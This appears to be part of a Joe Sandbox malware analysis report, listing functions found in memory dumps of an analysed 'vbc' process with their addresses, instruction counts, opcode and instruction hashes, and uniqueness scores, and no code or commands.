                                                                                                    Function 0054E398 Relevance: .0, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 1cd9a035fa10cde4ea76c421f0eec56874d9fb22c9e2a76a935e2165d5235a96
                                                                                                    • Instruction ID: 47b0a9faaf3df18a8519da4ea282bce97ae2d7fb6e58a537a5fb1315c0e46d76
                                                                                                    • Opcode Fuzzy Hash: 1cd9a035fa10cde4ea76c421f0eec56874d9fb22c9e2a76a935e2165d5235a96
                                                                                                    • Instruction Fuzzy Hash: 82F02D367001045BCF149629D884DFEBB66EFC4334F05C126ED15973A1DE348D07C691
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 048496D1 Relevance: .0, Instructions: 43COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6314f103084f8e45e0b3c7f9a555df512ec6f9c324d418c473506c30bdab7922
                                                                                                    • Instruction ID: dacca3ec0fd730b235e40aa2fc04333782c58dfb4432a6dde6a11f37609f7dca
                                                                                                    • Opcode Fuzzy Hash: 6314f103084f8e45e0b3c7f9a555df512ec6f9c324d418c473506c30bdab7922
                                                                                                    • Instruction Fuzzy Hash: 8501A7313046401BC724DF79D89085A7BA3EFC5324325CA7DD1ADCB692DF74A806C750
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9C90 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e879b00fe51308cdaa0364c3270696410532e3df063a0fbcc1227478785a8864
                                                                                                    • Instruction ID: cb848c38c9d4381580ebe2b81eea8f2336a0bec6fcfd88239f4817a34bff4727
                                                                                                    • Opcode Fuzzy Hash: e879b00fe51308cdaa0364c3270696410532e3df063a0fbcc1227478785a8864
                                                                                                    • Instruction Fuzzy Hash: 33F0C8303006888FD710AF6A98A49AF7BA9EFD1318364853AE607D7355DF609D068794
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005459E8 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d3c3de9bc1adaf4c25d22d34cfb11edae79fea03df3ec26dba3c676375c891db
                                                                                                    • Instruction ID: 1a9a0a9480ef389dd82f8c0d1e565a15347c1949f83aa14266d5d4894e9f62f3
                                                                                                    • Opcode Fuzzy Hash: d3c3de9bc1adaf4c25d22d34cfb11edae79fea03df3ec26dba3c676375c891db
                                                                                                    • Instruction Fuzzy Hash: A8F0CD313004109FC7049E2EC880E6ABBDAFBC8664B5181B9E609CB366CA21EC01C7D0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052CBC0 Relevance: .0, Instructions: 41COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b2083ee87a62ef2687d2a88e551ed777ca997412a8564582c1c12bb29e115080
                                                                                                    • Instruction ID: c576cb2c6db45083a6e9250beec194a460f47d19e17f394c7339d7809e30b6f7
                                                                                                    • Opcode Fuzzy Hash: b2083ee87a62ef2687d2a88e551ed777ca997412a8564582c1c12bb29e115080
                                                                                                    • Instruction Fuzzy Hash: 8CF0287120C294AFCB025F14AC52CBE3F66AFC6310B25891FF942961A3C1665861A761
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F7950 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 56b15a9b073d1ed3a7c7aeba2ad3ea7fcb4b37304d4db49e881ba42fdcf6764d
                                                                                                    • Instruction ID: 651940386cbcd0d6e75788e4b40039a5101cf18e8bb0665848cd25bc294d33f3
                                                                                                    • Opcode Fuzzy Hash: 56b15a9b073d1ed3a7c7aeba2ad3ea7fcb4b37304d4db49e881ba42fdcf6764d
                                                                                                    • Instruction Fuzzy Hash: 42F0276530C24C5FE30105521C95E73AFA6E7C63107A8417BF24ACB692C89C4C0BD72E
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00523C18 Relevance: .0, Instructions: 39COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: dd17d8ac0ad6a9b0780f4e3740ecdbf5cc7427676125abc044ff0f48a0ea64ba
                                                                                                    • Instruction ID: 012e3c221a60e858c12e912ddc157548dbc5ca6d25f84591b82aab5f6e8d392c
                                                                                                    • Opcode Fuzzy Hash: dd17d8ac0ad6a9b0780f4e3740ecdbf5cc7427676125abc044ff0f48a0ea64ba
                                                                                                    • Instruction Fuzzy Hash: 8DF0287164E2D05FC301C76868196A97FA19FC3308B1D81EFD545EF287D66A8C0B9341
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F3138 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c779af5b78f9ac6adc2f05424badb528984e6e7ad63b764c9daafb6ecdc7afd3
                                                                                                    • Instruction ID: c208a5eb56fdf3a1574ecec9cf6ae7daca7b88692c6b8e8c10ab3998ab460f31
                                                                                                    • Opcode Fuzzy Hash: c779af5b78f9ac6adc2f05424badb528984e6e7ad63b764c9daafb6ecdc7afd3
                                                                                                    • Instruction Fuzzy Hash: 33F0A9352081849FC702DB54D85487E7F66EBC5350B18849EF585CB296C6358D06DB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9B60 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: c5b3441610d9d461486a2d0a5f2e5000909e799b78a84306addd6611ec728a63
                                                                                                    • Instruction ID: c99273c9d9a204985e5de8677e515707279293f3d5778a32ff4ae184e22fadae
                                                                                                    • Opcode Fuzzy Hash: c5b3441610d9d461486a2d0a5f2e5000909e799b78a84306addd6611ec728a63
                                                                                                    • Instruction Fuzzy Hash: 54F02E2530D1485FC71126A53C91B7E7F9AE7C535472405EBD307C7246C9191D0753AB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00543A68 Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8b3420106d921fb245b6d2162bdd961dda477d50274c024c8933c1fb71772cf5
                                                                                                    • Instruction ID: 1e50d57bbfc30d4c457f6515adf4b7568b416587b613f3be51ccafda784be9d2
                                                                                                    • Opcode Fuzzy Hash: 8b3420106d921fb245b6d2162bdd961dda477d50274c024c8933c1fb71772cf5
                                                                                                    • Instruction Fuzzy Hash: 86F02473B8D2904FE32243695C24365BFA1EB96308F1D409AC1C1CF3B2DA968E06D351
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052D0EA Relevance: .0, Instructions: 38COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fda76be7951ef7e0363378648bd4b8e93d00f1c56298511382b9c94d434e8870
                                                                                                    • Instruction ID: 2bc36cd7957097d3a3ca4926b3e803ea501bd99684493d583b5a1b07a7ee032f
                                                                                                    • Opcode Fuzzy Hash: fda76be7951ef7e0363378648bd4b8e93d00f1c56298511382b9c94d434e8870
                                                                                                    • Instruction Fuzzy Hash: 75F0B42034C2A05F87067224BD558BD3FB6AFC73103204A6FE442876C6CA595D1297B7
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004FA2C8 Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bf6b24a124a57c37b141073b8e413a3f4924996b53921204ad58d6141d0c1802
                                                                                                    • Instruction ID: 8cf16a39e031d760b6444fc6dc23d0839513a6d04e8af78fc0d54db72d667234
                                                                                                    • Opcode Fuzzy Hash: bf6b24a124a57c37b141073b8e413a3f4924996b53921204ad58d6141d0c1802
                                                                                                    • Instruction Fuzzy Hash: B2F0C231609284AFC722CB99D880EAEBFA1EF84314718C05BE948CB262C6359912CB52
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F23B0 Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 59a45406f2de50b1f454a6058f434ce8187000a058b1d4442e52d6e7202a1a85
                                                                                                    • Instruction ID: f90ec5bfe64664f67908800dfe0da2e6809df9b8a4ca7fd203ea7655144e8602
                                                                                                    • Opcode Fuzzy Hash: 59a45406f2de50b1f454a6058f434ce8187000a058b1d4442e52d6e7202a1a85
                                                                                                    • Instruction Fuzzy Hash: E2F09C213181548BD314D6699554B7A7BD9AB85314F14047FE207C7752CAE8AC4683A7
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00543A10 Relevance: .0, Instructions: 37COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 663473caeca3b297ee7c2e332478858eb0149625cf07865f8f0cc9c4067e705d
                                                                                                    • Instruction ID: 4db78d5d513f79c90907cc171b7e0c4038f193bdf6d77c3e11d639dea8ca3b48
                                                                                                    • Opcode Fuzzy Hash: 663473caeca3b297ee7c2e332478858eb0149625cf07865f8f0cc9c4067e705d
                                                                                                    • Instruction Fuzzy Hash: 71F02E32F482115FE71487599C54B6BF7E9FBC8724F148029D545DB351CB71AD4287C0
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9968 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5e9ac199d6be01d3d487319c510b98753a883b03d1753e9c819f093c54762eab
                                                                                                    • Instruction ID: 127d6e633faf404dcbf6f26765a9ae0fe12fa68f3d246245de67e77f9e58d2f8
                                                                                                    • Opcode Fuzzy Hash: 5e9ac199d6be01d3d487319c510b98753a883b03d1753e9c819f093c54762eab
                                                                                                    • Instruction Fuzzy Hash: DEF09072504149AFCB12DFC0CC40CAA7F76EF89214B0580ABF90487722DB728D21DB91
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1B90 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 668f60d8d1013a0867c8c342df2cbc41edd07091b34898f10dc716132c254075
                                                                                                    • Instruction ID: 49d3f880fbfb4d03357926340c6e6fbb02fe8fc85cb94b2f3bc598d011dc95e3
                                                                                                    • Opcode Fuzzy Hash: 668f60d8d1013a0867c8c342df2cbc41edd07091b34898f10dc716132c254075
                                                                                                    • Instruction Fuzzy Hash: 2AF0903130815CDF8705AE89D844C7F3BBAEB84350B248026F716C7269DB35AC12ABE6
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F5D50 Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 96434afce921956007dfe99de73f90be0d578422ff195d2815f744d4fc54cabd
                                                                                                    • Instruction ID: d465d28fd55423e398dffd5aec460a21a7a2c3db12ac5f7912eaf413c5860217
                                                                                                    • Opcode Fuzzy Hash: 96434afce921956007dfe99de73f90be0d578422ff195d2815f744d4fc54cabd
                                                                                                    • Instruction Fuzzy Hash: 9CF058A152E7C89FC7438BB04CA44D97FB1DE07104B4A42EBC880CB1A3E6390A1E9363
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052CBD0 Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4253282bea6ee68c53c2896471896275f499b7b5fb8e002f5a1116928768fbd0
                                                                                                    • Instruction ID: 62fd8a36b74ac4cca8154eb6d349ddc82584b27e35d43331b6eea7b2332d96a0
                                                                                                    • Opcode Fuzzy Hash: 4253282bea6ee68c53c2896471896275f499b7b5fb8e002f5a1116928768fbd0
                                                                                                    • Instruction Fuzzy Hash: 06F0AE71204128EFCB015E09EC42C7E3F6AFFC9750B60C51AFA05561A1C6729C5167A5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0484F400 Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.608430090.0000000004840000.00000040.00000800.00020000.00000000.sdmp, Offset: 04840000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4840000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bff9d0a437772e2294aa93139809a088dcaa16c61a7005873bbee10f8c7af081
                                                                                                    • Instruction ID: 62be88adf1aacea4c58d4e4197b9ef62bdb243442c430cba72837271c29fff24
                                                                                                    • Opcode Fuzzy Hash: bff9d0a437772e2294aa93139809a088dcaa16c61a7005873bbee10f8c7af081
                                                                                                    • Instruction Fuzzy Hash: F2F05E2054E7C9AFC303CB789C7189A7FB09D43204B5A43EBD484CB0A7D6291E2E9367
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005268F8 Relevance: .0, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9290aa274334ded12e55f1d805cf2129afebf0950bf8064cf1eb82c0e0f6dfbc
                                                                                                    • Instruction ID: b888171bca819f09d8344b47edf91867a37f226a0e8b19b9f3a828821804080f
                                                                                                    • Opcode Fuzzy Hash: 9290aa274334ded12e55f1d805cf2129afebf0950bf8064cf1eb82c0e0f6dfbc
                                                                                                    • Instruction Fuzzy Hash: 19F0F936048284BFCB078F94DC50CA5BF76EF4932070A84DAF5448B573C276C821EB51
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00262320 Relevance: .0, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.603959792.0000000000260000.00000040.00000800.00020000.00000000.sdmp, Offset: 00260000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_260000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 570a20e1d8e4fba3d29489e9831599310977f392599c3954b83b1a0d548ea2ad
                                                                                                    • Instruction ID: 7fdad06389edb8a65dca2d4b7024465a61c3ab004732452849cc64ae685b981d
                                                                                                    • Opcode Fuzzy Hash: 570a20e1d8e4fba3d29489e9831599310977f392599c3954b83b1a0d548ea2ad
                                                                                                    • Instruction Fuzzy Hash: CB018130C1824B8ADF119BA488946EABB75FF62340F254759D8853B141D774366ACBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F60D1 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a4deaa0319d60c10469ab680c31144db45ffa52e4bd8bd923d86ee72c436d9db
                                                                                                    • Instruction ID: 9aecc7bc288a464300781cc9973d2e805a622dafe5d3c961e1f5b171621762a7
                                                                                                    • Opcode Fuzzy Hash: a4deaa0319d60c10469ab680c31144db45ffa52e4bd8bd923d86ee72c436d9db
                                                                                                    • Instruction Fuzzy Hash: 09F0E52220D2ACAFC71156555A108BA6F69C7E2350B32825FEB4787143C45E8907B77B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F7960 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 8ab48b0f3eb63b5cbf77d0b6627cc9c6d35bed35aeceba60374b8478acbcaad9
                                                                                                    • Instruction ID: 4d588eeab186d5f651b43c66e9d2187775c0fb076af878202510871dfb83645e
                                                                                                    • Opcode Fuzzy Hash: 8ab48b0f3eb63b5cbf77d0b6627cc9c6d35bed35aeceba60374b8478acbcaad9
                                                                                                    • Instruction Fuzzy Hash: 2FE0D87530C21C6BB31014575C81E37A59BE3C9750660403BF70A87342C89C4C0796AE
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F1A8A Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 24ea2a4a4a6fad605606765199e9d7731b9d3d2f05018411335fd3c3347c2b28
                                                                                                    • Instruction ID: c861e59a1294d1a1337a760737f454f03c6ec6274574da02dff597213e59d855
                                                                                                    • Opcode Fuzzy Hash: 24ea2a4a4a6fad605606765199e9d7731b9d3d2f05018411335fd3c3347c2b28
                                                                                                    • Instruction Fuzzy Hash: 4EF0897630C684DFC646DBA4E8608AAFBA69BD5710704459FE48087192C6258D09D767
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004F9B70 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604538435.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_4f0000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fe28298dae375e551cfafcbee867f1cb8708886a60bc4de91e25c727a16596bd
                                                                                                    • Instruction ID: 7973f855e655feb65531a0b9c3fcc492a0e79a4aab3263ebc20a916179a8c07d
                                                                                                    • Opcode Fuzzy Hash: fe28298dae375e551cfafcbee867f1cb8708886a60bc4de91e25c727a16596bd
                                                                                                    • Instruction Fuzzy Hash: F0E09A2130811DAB9200259A7C82B3A768FA3C83A5A20456BE70697344CA5AAC0712AB
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0052D0F8 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 17690bc0a714d692961a000d77b8d6d7b28f7ff422dd37c6251676f78fbe40dc
                                                                                                    • Instruction ID: 3dd74a30fb45b5f35b1b0f2845aae023974192acc788db15182be75aab9a4db1
                                                                                                    • Opcode Fuzzy Hash: 17690bc0a714d692961a000d77b8d6d7b28f7ff422dd37c6251676f78fbe40dc
                                                                                                    • Instruction Fuzzy Hash: 47E02B303045749706067215F94187D3ABBBFC7710310492BE102877C4CE255D2293FA
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 005200E0 Relevance: .0, Instructions: 31COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604658452.0000000000520000.00000040.00000800.00020000.00000000.sdmp, Offset: 00520000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_520000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5121d10509c0d6f2f047a8617477a102734b9f036f9b66c016105baf10da2856
                                                                                                    • Instruction ID: afd09d75c8e42b04521818aa512dc745e7d823860155eeeef793e9d5cb8381d1
                                                                                                    • Opcode Fuzzy Hash: 5121d10509c0d6f2f047a8617477a102734b9f036f9b66c016105baf10da2856
                                                                                                    • Instruction Fuzzy Hash: 94F0E2E664D2A09FD302CB209C618A1BF90FFE3300B0898CFD490472D3D3118917DB21
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00547920 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.604680147.0000000000540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00540000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_540000_vbc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 31c3f070e81b8f25a0876f3fba0cdeccb8ebc5cbb7133784d59761aac11a101f
                                                                                                    • Instruction ID: de808afb8d89804f48fbbf94d17991664729844fce396615957b87392f554795
                                                                                                    • Opcode Fuzzy Hash: 31c3f070e81b8f25a0876f3fba0cdeccb8ebc5cbb7133784d59761aac11a101f
                                                                                                    • Instruction Fuzzy Hash: 0EF0AE9680EBD62FC3138A6818B52557F306F67244F4E04DBC9C49B1E7E118196DD3A3
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

